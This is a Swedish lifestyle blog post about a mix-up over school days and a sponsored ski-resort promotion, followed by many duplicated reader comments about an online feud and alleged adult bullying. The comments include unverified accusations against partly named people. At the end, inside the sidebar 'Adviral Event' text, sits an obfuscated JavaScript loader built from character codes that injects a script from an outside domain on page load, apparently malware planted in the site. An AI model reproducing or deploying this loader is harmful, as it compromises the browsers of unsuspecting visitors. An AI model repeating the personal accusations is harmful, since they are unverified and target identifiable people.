Jag tar prisernas pris! Detta är bara en sak som jag lyckas med!

Alltså jösses Amalia! Jag är ju bara så pinsam ibland!!!!

Hahahaha! Har du läst mitt förra inlägg? Om inte gör det! Redo för skolan, krigade jag mig genom köerna. Jag förstod världen inte VARFÖR det var sådana jävulusiska köer just idag. jag åker alltid medvetet ca 30 min innan jag behöver för att komma ut innan det blir kaos. Kaffe nybryggt med mig i bilen, matlådor och mellanmål nerpackade med träningskläder och skolböcker..

 Men nu imorse så ställde trafiken till det. Det gick inte bara långsamt, det stod helt stilla! Hmm, jag slog på gps, som informerade om att det skulle ta 1.5 timme till skolan. Jag fick panik inombords! Jag ringde upp min klasskamrat och bänkkamrat Rasmus för att be honom hälsa att jag fastnat i köerna. Han lyssnade, och svarade… ”Men My, vi har ingen skola idag” Hahahaha! 

Nähe?! Gud vad snurrig jag är!  För mig är det nämligen torsdag idag ! I min värld, inte i din eller alla andras 😉

Ingenting stämmer för mig nu när Lilleman inte kom upp när han borde och det är några andra saker som hänt (berättar när det är officiellt) Haha!

Jag lyckades ta av nästa avfart och vände efter en halvtimme och åkte istället till Gymmet SATS i Märsta. Körde ett pass, helkropp och mycket teknik övning.  Nu har jag varit hemma en stund, pluggat, mailat och sitter nu bänkad med datorn, plugg och jobb.

Vilken go känsla att få en dag mer än jag räknat med… Typ 😉  

Men jag ska nog pass på att lägga mig i soffan och titta på tv en stund. jag har nämligen inte haft tv sedan i oktober förra året. Eller, tv har jag haft, men inga kanaler.  NU häromdagen skaffade jag en boxer. VILKEN lyx! jag hade helt van bort mig från tvn. Ifall det varit något jag velat se har jag ju haft datorn. Men väldigt sällan. Vem tror du blev överlycklig för just detta? Jo, min Lilleman som jag berättade det för idag när vi pratade =) Nu har jag paus, och ska äta sen fruost…. Gröt med kanel får det bli.

Sitter och kikar runt lite på roliga vinterplaner för mig och Lilleman. Branäs vinterort, är utsedd till bästa skidort för barn 2016 =) Har du varit där? Känner du till Branäs vinterort?image image 

Min bloggportal, Allt för föräldrar just nu har ett samarbete med Branäs och Kungsberget, på en ny undersida som heter ”Skidsemester”.

Där kan man vinna en vinterresa till Branäs, läsa artiklar om orterna och allmänt om att åka skidor. Så gå gärna in och tävla om du vill! -Tävlar man inte så vinner man inte 😉 

Jag har aldrig åkt skidor med Lilleman. Vett faktiskt inte varför, det har bara inte fallit sig så. Nu är han ju ändå fem och skulle förmodligen älska att få lära sig åka. Jag minns hur det var som barn att vara med på skidsemester, det var verkligen bland det bästa jag visste. Härlig kombo med att vara väldigt aktiv på sin semester =) Drick avart choklad, och mysa av omgivningen. Rogivande för både kropp och själ =) 


Alla aktiviteter är gratis för barn som har liftkort,Du kan läsa mer om resan, boende och inlägg HÄR på Allt för Föräldrars sida =) Jag ska föröka imma iväg på något roligt med Lilleman i vinter. Vi får se om detta kan vara något för oss. Hoppas det!

Vet ju inte riktigt hur jag kommer att jobba än då jag förhoppningvis även jobbar som PT inom kort 😉 Så innan jag bokar måste jag bara reda ut lite små praktiska saker först… =)

Kram på dig!

270816-MyMartens-HermanCaroan-0073

77 Komentarer

 1. Nu börjar det suga lite i skidtarmen! ? Fast jag gillar bäst värme egentligen… Vi var i Branäs hela gänget – man, son, svägerska (you know her! haha) med son och kompis med son, pappa, syster och svärisarna! – för några år sedan och det var väldigt bra. Vår son var så liten då (typ 1) så han stannade mest i stugan hos farmor och farfar eller satt i vagnen. Positivt att det är relativt nära att köra dit jämfört med Sälen eller Vemdalen där vi var i februari.
  Tror nog Ludvig skulle gilla skidor, de blir ju så stolta när de lärt sig, då går det undan i backen och man får knappt in dem i stugan. ?
  Skönt med en ”ledig” dag. ?
  Stor kram / Sofia

  • hahahaha! så du har varit där =) Funderar verkligen på att åka dit… =)Jag tror du har rätt angående Ludvig, han skulle älska det! Ge svägerskan en kram ifrån mig ? Min lediga dag består av plugg, och gos med kissen istället ? Kram <3

 2. Mobbningen fortsätter i sin allra lägsta form! Blir så j…a arg av att se en tidigare vän och som är bloggkollega skriva fula insinuationer som utan tvekan är riktade mot dej, och DESSUTOM släppa fram en ful kommentar som namnger dej My ! Kan inte tigande se på hur sån äcklig vuxenmobbing får fortgå för det går tyvärr inte att tiga ihjäl mobbing ?

  • Mmmm…. Lågt, mycket lågt. Att kommunicera via sociala medier, inte ta emot min utsträckta hand och driva på en häxjakt utan dess like! Jag lär så länge man lever. jag är väldigt sårad, ledsen och besviken. Men, för min och Lilleman skull, så släpper jag taget. Jag går vidare. Utan dom jag kallat min egna familj. Om det gör ont? -Det gör fruktansvärt ont!
   Men det är ingen ide att försvara mig, då det är så mycket lögner helt utan substans att jag inte ens vet vad som säger/skrivs om mig längre….. Hur jag ska få ett stopp, på det. Ingen aning =( Men jag försöker att fokusera och sköta mitt! Kram

  • Håller med dej Andrea man tror inte det
   är sant ….vuxna människor. Som har egna barn.
   Är bara ute efter att skapa intriger.
   Sandlådenivå.

   • Det är så ledsamt och tragiskt att det är en människa med egna barn som bär sej åt så här! Vilken förebild är hon för sina barn? Och hur skulle hon känna om hennes barn, vänner, eller hon själv blev utsatt för hat, lögner och rent förtal ?

   • En otroligt kändiskåt flerbarnsmamma som vägrar ge upp hetsjakten på My , i hopp om att bli invald i kretsen kändismammor / kändisar genom att fjäska med text och hjärtan på deras instagram och låtsas att de är bästisar ! Liiiite patetiskt ?? kan man tycka .

 3. Nu börjar det suga lite i skidtarmen! 🙂 Fast jag gillar bäst värme egentligen… Vi var i Branäs hela gänget – man, son, svägerska (you know her! haha) med son och kompis med son, pappa, syster och svärisarna! – för några år sedan och det var väldigt bra. Vår son var så liten då (typ 1) så han stannade mest i stugan hos farmor och farfar eller satt i vagnen. Positivt att det är relativt nära att köra dit jämfört med Sälen eller Vemdalen där vi var i februari.
  Tror nog Ludvig skulle gilla skidor, de blir ju så stolta när de lärt sig, då går det undan i backen och man får knappt in dem i stugan. 😉

  Skönt med en ”ledig” dag. 😉

  Stor kram / Sofia

  • hahahaha! så du har varit där =) Funderar verkligen på att åka dit… =)Jag tror du har rätt angående Ludvig, han skulle älska det! Ge svägerskan en kram ifrån mig 😉 Min lediga dag består av plugg, och gos med kissen istället 😉 Kram <3

 4. Du måste lära dig åka kommunalt ! Tjänar både tid och framför allt PENGAR ! Ta bilen till Märsta och sen pendeln, snabbt o billigt. Tänk lite på miljön också!!
  My, vad är det för skitprat om dig i kommentarerna hos andra bloggarna? Hur kan folk veta så mycket om dig? Det är inga fina saker de skriver. Är du verkligen ovän med alla de där s.k kändisbloggande mammorna ?
  Ha en fin ledig dag idag

  • hej! Ja, jag måste verkligen lära mig att åka kommunalt! Vissa dagar skulle det fungera. Andra inte, då möten/jobb är utspridda även heeeela 08-området. Men alla dagar som jag kan åka kommunalt då ska jag åka kommunalt ? Ja du, vad är det för skitprat du läser om mig? Varför vet alla andra så mycket mer om mig själv än jag själv gör? Den frågan har jag pikås tillät mig. Ingen människa är felfri, inte jag heller. Men jag vet em jag är och vad jag står för. Det jag själv har läst är långt ifrån mig. Jag valde att försöka försvara mig och stå upp för mig själv i vissa lägen. Men det ligger långt utanför min kontroll. jag kan inte påverka det gift och dom lögner som sprids. Därför kör jag mitt race, jag håller mig höet utanför ”det där” och vet i mitt hjärta vad som är rätt och fel. Det gör fortfrände ont då jag förlorat tre riktigt nära vänner. MEN jag vet att sanningen kommer fram, och då kommer det se annorlunda ut igen. Frågan är bara då från min sida om det inte runnit för mycket vatten under broarna. För jag anser, oavsett om man är känd/okänd ung/gammal så är man riktigt goda vänner, så tar man upp ett problem, pratar om det och reder ut det. Man synar den typ av lögner som utomstående intrigmakerskor försöker att integrera. Gör man inte det, ja… då var man kanske inte så goda vänner trots alt..

   • Jag håller med dig om att är man vänner dom tycker olika eller om det uppstått ett missförstånd så talar man ut och rensar luften. I detta fall verkar det ju som om vännerna inte tycker att det är ett alternativ och därför går man ju anta att dom anser att dom har belägg för sina åsikter om dig och inte tycker du är värd att reda ut något med. Jag tror nog att du vet vad som orsakat detta, vilket rykte som ligger till grund. Om dina föredetta vänner inte vill höra vad du har att säga så tycket jag att du borde skriva ett blogginlägg där du berättar om vad som hänt ur ditt perspektiv. På så sätt kanske folk slutar spekulera, lyssna på rykten och dra slutsatser utifrån felaktiga hintar.

    • Vad man antar och inte antar det ligger i betraktarens öga.
     Om jag skulle berätta sanningen i ett blogginlägg, vad skulle konsekvenserna bli av det. Kraschade familjer, sårade barn och vänner. Nej, jag väljer att ”skydd” mina nära som Vänt mig ryggen. Jag har NOLL bekräftelsebehov. Jag behöver inte försvara mig. Dom som känner mig VET. Jag VET. Vad kleti och pleti tror sig veta lägger jag inge energi på…. Dom av de ”mina” som svalt betet med hull och hår ifrån diverse ytliga bekanta bloggerskor, borde veta/vetat bättre. Både med tanke på ålder OCH erfarenhet. Men ibland, skyddar man sig själv om man inte har rent mjöl i påsen.. Som i detta fallet. Jag har ren rejäl i påsen. Jag är inte perfekt, men är inte inte i närheten av allt som skriva och sägs. Det kommer både tiden och sanningen att utvisa. Dom som är som riktiga vännerna kommer att syna detta. Dom som inte gör det, vill jag inte ha i mitt liv…. Varken nu eller senare. Det spelarbiten roll om det vore ”drottningen” själv. Lojalitet, ärlighet, ödmjukhet, omtänksamhet och självdistans är några saker kag värdesätter högt!

     • Oj…jag förstår hur du tänker med att inte vilja såra barn. Tror dom flesta läsare har förstått att det handlar om antingen otrohet elle pengar. Du bekräftade precis det :S

     • Häller med dig stå på dig du är stark, men ta inget skit det är du inte värd
      Men fy för vuxen mobbing
      Det är hemsk som vuxna kan bete sig.
      Man blir rädd hur ska barnen se på detta dom lever ju i det och märker det säkert.
      My du är en underbar Mamma och person

     • Nej, allting når en gräns…. Men DEN nivån vill jag inte ligga på! Dom människors Som är utstuderat elaka vill jag inte ha i mitt liv! <3 Tack snälla du <3 kram

 5. Mobbningen fortsätter i sin allra lägsta form! Blir så j…a arg av att se en tidigare vän och som är bloggkollega skriva fula insinuationer som utan tvekan är riktade mot dej, och DESSUTOM släppa fram en ful kommentar som namnger dej My ! Kan inte tigande se på hur sån äcklig vuxenmobbing får fortgå för det går tyvärr inte att tiga ihjäl mobbing 😈

  • Mmmm…. Lågt, mycket lågt. Att kommunicera via sociala medier, inte ta emot min utsträckta hand och driva på en häxjakt utan dess like! Jag lär så länge man lever. jag är väldigt sårad, ledsen och besviken. Men, för min och Lilleman skull, så släpper jag taget. Jag går vidare. Utan dom jag kallat min egna familj. Om det gör ont? -Det gör fruktansvärt ont!
   Men det är ingen ide att försvara mig, då det är så mycket lögner helt utan substans att jag inte ens vet vad som säger/skrivs om mig längre….. Hur jag ska få ett stopp, på det. Ingen aning =( Men jag försöker att fokusera och sköta mitt! Kram

  • Håller med dej Andrea man tror inte det
   är sant ….vuxna människor. Som har egna barn.
   Är bara ute efter att skapa intriger.
   Sandlådenivå.

   • Det är så ledsamt och tragiskt att det är en människa med egna barn som bär sej åt så här! Vilken förebild är hon för sina barn? Och hur skulle hon känna om hennes barn, vänner, eller hon själv blev utsatt för hat, lögner och rent förtal ?

   • En otroligt kändiskåt flerbarnsmamma som vägrar ge upp hetsjakten på My , i hopp om att bli invald i kretsen kändismammor / kändisar genom att fjäska med text och hjärtan på deras instagram och låtsas att de är bästisar ! Liiiite patetiskt 😂😂 kan man tycka .

 6. Du måste lära dig åka kommunalt ! Tjänar både tid och framför allt PENGAR ! Ta bilen till Märsta och sen pendeln, snabbt o billigt. Tänk lite på miljön också!!
  My, vad är det för skitprat om dig i kommentarerna hos andra bloggarna? Hur kan folk veta så mycket om dig? Det är inga fina saker de skriver. Är du verkligen ovän med alla de där s.k kändisbloggande mammorna ?
  Ha en fin ledig dag idag

  • hej! Ja, jag måste verkligen lära mig att åka kommunalt! Vissa dagar skulle det fungera. Andra inte, då möten/jobb är utspridda även heeeela 08-området. Men alla dagar som jag kan åka kommunalt då ska jag åka kommunalt 😉 Ja du, vad är det för skitprat du läser om mig? Varför vet alla andra så mycket mer om mig själv än jag själv gör? Den frågan har jag pikås tillät mig. Ingen människa är felfri, inte jag heller. Men jag vet em jag är och vad jag står för. Det jag själv har läst är långt ifrån mig. Jag valde att försöka försvara mig och stå upp för mig själv i vissa lägen. Men det ligger långt utanför min kontroll. jag kan inte påverka det gift och dom lögner som sprids. Därför kör jag mitt race, jag håller mig höet utanför ”det där” och vet i mitt hjärta vad som är rätt och fel. Det gör fortfrände ont då jag förlorat tre riktigt nära vänner. MEN jag vet att sanningen kommer fram, och då kommer det se annorlunda ut igen. Frågan är bara då från min sida om det inte runnit för mycket vatten under broarna. För jag anser, oavsett om man är känd/okänd ung/gammal så är man riktigt goda vänner, så tar man upp ett problem, pratar om det och reder ut det. Man synar den typ av lögner som utomstående intrigmakerskor försöker att integrera. Gör man inte det, ja… då var man kanske inte så goda vänner trots alt..

   • Jag håller med dig om att är man vänner dom tycker olika eller om det uppstått ett missförstånd så talar man ut och rensar luften. I detta fall verkar det ju som om vännerna inte tycker att det är ett alternativ och därför går man ju anta att dom anser att dom har belägg för sina åsikter om dig och inte tycker du är värd att reda ut något med. Jag tror nog att du vet vad som orsakat detta, vilket rykte som ligger till grund. Om dina föredetta vänner inte vill höra vad du har att säga så tycket jag att du borde skriva ett blogginlägg där du berättar om vad som hänt ur ditt perspektiv. På så sätt kanske folk slutar spekulera, lyssna på rykten och dra slutsatser utifrån felaktiga hintar.

    • Vad man antar och inte antar det ligger i betraktarens öga.

     Om jag skulle berätta sanningen i ett blogginlägg, vad skulle konsekvenserna bli av det. Kraschade familjer, sårade barn och vänner. Nej, jag väljer att ”skydd” mina nära som Vänt mig ryggen. Jag har NOLL bekräftelsebehov. Jag behöver inte försvara mig. Dom som känner mig VET. Jag VET. Vad kleti och pleti tror sig veta lägger jag inge energi på…. Dom av de ”mina” som svalt betet med hull och hår ifrån diverse ytliga bekanta bloggerskor, borde veta/vetat bättre. Både med tanke på ålder OCH erfarenhet. Men ibland, skyddar man sig själv om man inte har rent mjöl i påsen.. Som i detta fallet. Jag har ren rejäl i påsen. Jag är inte perfekt, men är inte inte i närheten av allt som skriva och sägs. Det kommer både tiden och sanningen att utvisa. Dom som är som riktiga vännerna kommer att syna detta. Dom som inte gör det, vill jag inte ha i mitt liv…. Varken nu eller senare. Det spelarbiten roll om det vore ”drottningen” själv. Lojalitet, ärlighet, ödmjukhet, omtänksamhet och självdistans är några saker kag värdesätter högt!

     • Oj…jag förstår hur du tänker med att inte vilja såra barn. Tror dom flesta läsare har förstått att det handlar om antingen otrohet elle pengar. Du bekräftade precis det :S

     • Häller med dig stå på dig du är stark, men ta inget skit det är du inte värd
      Men fy för vuxen mobbing
      Det är hemsk som vuxna kan bete sig.
      Man blir rädd hur ska barnen se på detta dom lever ju i det och märker det säkert.
      My du är en underbar Mamma och person

     • Nej, allting når en gräns…. Men DEN nivån vill jag inte ligga på! Dom människors Som är utstuderat elaka vill jag inte ha i mitt liv! <3 Tack snälla du <3 kram

  • Blev inte särskilt förvånad när min kommentar också tagits bort ?
   Tyckte bara att en bloggare inte ska sitta
   och skriva mellan rader… och inbjuda till intriger.
   Och få en massa kommentarer från vissa som tror sej veta allt.
   Så det har rensats en hel del .

  • Blev inte särskilt förvånad när min kommentar också tagits bort 🙂
   Tyckte bara att en bloggare inte ska sitta
   och skriva mellan rader… och inbjuda till intriger.
   Och få en massa kommentarer från vissa som tror sej veta allt.

   Så det har rensats en hel del .

 7. Hej! Jag kan varmt rekomendera Branäs. Vi har varit där flera år i rad. Fina backar, stugorna är perfekta. Har även bott i hotell delen. Stugbyn Lohyllan uppe på Branäs berget har vi varit medt nöjd med. Ha de gott, Jessica

 8. Hejsan!!
  Kan verkligen rekommenderar Branäs, framför allt om man har mindre barn.
  Mina killar har lärt sig åka skidor där, det är några år sedan vi var där men det byggs ju ut hela tiden så jag tror inte det har blivit sämre.
  Vi har bott på dom flesta boende där och tycker att boenden på toppen är mysigast, blir mest fjällen känsla där.
  Önskar er en skön vinter resa oavsett vart den bär?
  Kramar Millan

 9. Du är stark My, min kommentar på maddes blogg togs oxå bort, hon spara bara dom var till hennes fördel, och de som man anade handla om dig. Så trött allt förtal om dig, för jag tycker det gått för långt, även om dom tycker att du gjort nåt.

  • Hon vet ingenting om någonting…. Egentligen. Och känner inte heller dom inblandade. Så sorgligt bara att driva på ett hat och vuxen mobbning som hon m.f gör. Vi ska vara föredömen för våra barn, inte tvärt om ? Men en människa som utstuderat och medvetet gör någon annan illa vill jag inte ha i mitt liv! Tur att jag förstod det innan jag släppte henne nära…. Nu kan jag bara fortsättningsvis ignorera henne. Det tycker jag att ni hör inne också ska göra. Släpp ämnet, och lägg ingen energi på henne så kanske hon tröttnar…

   • Heja dig My. Jag har min uppfattning. Du har ju många fina andra vänner, bl.a. Åsa Brennander härligt med såna människor. Lycka till med allt. Kram

   • Vi är fler och fler som inser det ytterst obehagliga som pågår på diverse bloggar. Oavsett vad som hänt är det ovärdigt och precis som du skriver utstuderat elakt. Och sen förnekar de att det är vuxenmobbning?!
    Jag är besviken på en blogg jag tidigare gillat mycket. Och andra som är så glada att vara på ”rätt” sida hänger på. De visar människan från sin sämsta sida. Kämpa på, My. Vi är många som fått nog nu.

   • Min uppfattningbär att ni är i samma båt. Ingen av er två är varken bättre eller sämre. Lös det emellan eller skriv inget om det. Det stjälper mer än hjälper skapar mera skvaller, skitsnack och irritation. Vem vet ni kanske skrattar åt detta om några år tillsammans:) Kärlek till alla!<3

    • Men det har inte med en person att göra.. Och vi Har och kommer aldrig sitta i samma båt! Tack för omtanken, men för att förstå denna situationen så behöver man heeeela story. Så nu släpper vi det här och går vidare… ?

 10. Hej! Jag kan varmt rekomendera Branäs. Vi har varit där flera år i rad. Fina backar, stugorna är perfekta. Har även bott i hotell delen. Stugbyn Lohyllan uppe på Branäs berget har vi varit medt nöjd med. Ha de gott, Jessica

 11. Hejsan!!
  Kan verkligen rekommenderar Branäs, framför allt om man har mindre barn.
  Mina killar har lärt sig åka skidor där, det är några år sedan vi var där men det byggs ju ut hela tiden så jag tror inte det har blivit sämre.
  Vi har bott på dom flesta boende där och tycker att boenden på toppen är mysigast, blir mest fjällen känsla där.
  Önskar er en skön vinter resa oavsett vart den bär😉
  Kramar Millan

 12. Du är stark My, min kommentar på maddes blogg togs oxå bort, hon spara bara dom var till hennes fördel, och de som man anade handla om dig. Så trött allt förtal om dig, för jag tycker det gått för långt, även om dom tycker att du gjort nåt.

  • Hon vet ingenting om någonting…. Egentligen. Och känner inte heller dom inblandade. Så sorgligt bara att driva på ett hat och vuxen mobbning som hon m.f gör. Vi ska vara föredömen för våra barn, inte tvärt om 🙁 Men en människa som utstuderat och medvetet gör någon annan illa vill jag inte ha i mitt liv! Tur att jag förstod det innan jag släppte henne nära…. Nu kan jag bara fortsättningsvis ignorera henne. Det tycker jag att ni hör inne också ska göra. Släpp ämnet, och lägg ingen energi på henne så kanske hon tröttnar…

   • Heja dig My. Jag har min uppfattning. Du har ju många fina andra vänner, bl.a. Åsa Brennander härligt med såna människor. Lycka till med allt. Kram

   • Vi är fler och fler som inser det ytterst obehagliga som pågår på diverse bloggar. Oavsett vad som hänt är det ovärdigt och precis som du skriver utstuderat elakt. Och sen förnekar de att det är vuxenmobbning?!
    Jag är besviken på en blogg jag tidigare gillat mycket. Och andra som är så glada att vara på ”rätt” sida hänger på. De visar människan från sin sämsta sida. Kämpa på, My. Vi är många som fått nog nu.

   • Min uppfattningbär att ni är i samma båt. Ingen av er två är varken bättre eller sämre. Lös det emellan eller skriv inget om det. Det stjälper mer än hjälper skapar mera skvaller, skitsnack och irritation. Vem vet ni kanske skrattar åt detta om några år tillsammans:) Kärlek till alla!<3

    • Men det har inte med en person att göra.. Och vi Har och kommer aldrig sitta i samma båt! Tack för omtanken, men för att förstå denna situationen så behöver man heeeela story. Så nu släpper vi det här och går vidare… 🙂

 13. Detta är mobbning på äcklig nivå. Vanita ****** verkar vara en fruktansvärt beräknande människa. Hänger med på en cancer precis som Lotta gjorde – skillnaden är att det fanns substans hos Lotta och hos den personen. VT agerar bara fult och man kräks lite när man tänker på A och vad hon har hamnat i.
  Ja kom nu till skott alla ni madammer som ”HAR” saker på My. Nu får ni komma till skott eller lägga ned helt! Avundsjuka? Besökskonkurrens?
  Superelak frisör i Skövde som vill kommentera kanske?
  ****** kanske du kan ge en hint om när man lämnar en vän vind för våg? Är det när ekonomin hos vännen inte pallar dina moves? Är det när vännen …. ja vad vet jag…
  Skitdålig stil av er som lämnade My! Så jävlig kan hon faktiskt inte vara! Men är hon det så säg det då ni luriga kärringar!!!

 14. Detta är mobbning på äcklig nivå. Vanita ****** verkar vara en fruktansvärt beräknande människa. Hänger med på en cancer precis som Lotta gjorde – skillnaden är att det fanns substans hos Lotta och hos den personen. VT agerar bara fult och man kräks lite när man tänker på A och vad hon har hamnat i.

  Ja kom nu till skott alla ni madammer som ”HAR” saker på My. Nu får ni komma till skott eller lägga ned helt! Avundsjuka? Besökskonkurrens?

  Superelak frisör i Skövde som vill kommentera kanske?

  ****** kanske du kan ge en hint om när man lämnar en vän vind för våg? Är det när ekonomin hos vännen inte pallar dina moves? Är det när vännen …. ja vad vet jag…

  Skitdålig stil av er som lämnade My! Så jävlig kan hon faktiskt inte vara! Men är hon det så säg det då ni luriga kärringar!!!

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/